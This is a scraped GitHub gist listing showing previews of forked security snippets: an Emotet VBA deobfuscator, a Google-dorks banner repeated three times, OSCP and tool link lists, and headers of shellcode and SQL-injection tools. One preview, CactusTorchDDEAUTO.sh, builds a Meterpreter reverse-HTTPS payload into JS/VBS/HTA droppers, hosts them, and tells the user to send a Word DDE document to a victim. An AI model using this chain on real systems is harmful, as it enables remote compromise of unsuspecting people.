24x7x365 SUPPORT http://www.captiongenerator.com/320492/Offsec-Student-Admins
http://www.fuzzysecurity.com/tutorials/16.html https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
. NoThrowForwardIt
NoThrowForwardIt
/ deobfuscator.py
Created
January 18, 2022 15:18
— forked from DissectMalware/deobfuscator.py
VBA deobfuscation - Emotet XLSM
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from oletools.olevba import VBA_Parser, TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML, TYPE_MHTML | |
| import sys | |
| import re | |
| vbaparser = VBA_Parser(sys.argv[1]) | |
| replace_regex = r"\s*([^=]+)\s*=\s*Replace\(\s*([^,]+)\s*,\s*\"([^,]*)\"\s*,\s*\"([^,]*)\"\s*\)" | |
| replace = re.compile(replace_regex, re.MULTILINE) | |
| regex_url = "http(s)?://[^,\"]+" |
NoThrowForwardIt
/ google-dorks
Created
August 9, 2020 12:27
— forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
NoThrowForwardIt
/ google-dorks
Created
August 9, 2020 12:27
— forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
NoThrowForwardIt
/ google-dorks
Created
August 9, 2020 12:27
— forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
NoThrowForwardIt
/ oscp_links.md
Created
March 10, 2019 23:54
— forked from cokebottle/oscp_links.md
Useful OSCP Links
NoThrowForwardIt
/ windows-toolkit.md
Created
January 1, 2019 23:28
— forked from jthuraisamy/windows-toolkit.md
Windows Toolkit
| IDA Plugins | Preferred | Neutral | Unreviewed |
|---|
NoThrowForwardIt
/ Numerics.cs
Created
March 2, 2018 00:34
Shellcode Stuffed Into A System.Numerics.BigInteger - Cause You Know Why Not ;-)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee |
NoThrowForwardIt
/ CactusTorchDDEAUTO.sh
Created
October 24, 2017 07:37
— forked from xillwillx/CactusTorchDDEAUTO.sh
CactusTorchDDEAUTO
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH | |
| IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'` | |
| msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin | |
| PAYLOAD=$(cat payload.bin | base64 -w 0) | |
| sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js | |
| sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs | |
| sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta | |
| cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta | |
| service apache2 start | |
| echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\ |
NoThrowForwardIt
/ facecheck2.0.php
Created
November 16, 2015 17:05
— forked from googleinurl/facecheck2.0.php
Verificação de usuários Facebook 2.0
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| E d i ç ã o - 2.0 / 29-09-2015 | |
| -------------------------------------------------------------------------------- | |
| [+] AUTOR: Cleiton Pinheiro / Nick: googleINURL | |
| [+] Blog: http://blog.inurl.com.br | |
| -------------------------------------------------------------------------------- | |
| */ |
NoThrowForwardIt
/ minisqlmap.bs
Created
November 16, 2015 17:01
— forked from googleinurl/minisqlmap.sh
MINI-EXPLOIT // SQLMAP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| : ' | |
| MINI-EXPLOIT // SQLMAP ~ | |
| ------------------------------------------------------ | |
| [+] AUTOR: Cleiton Pinheiro / Nick: googleINURL | |
| [+] EMAIL: [email protected] | |
| [+] Blog: http://blog.inurl.com.br | |
| [+] Twitter: https://twitter.com/googleinurl |
NewerOlder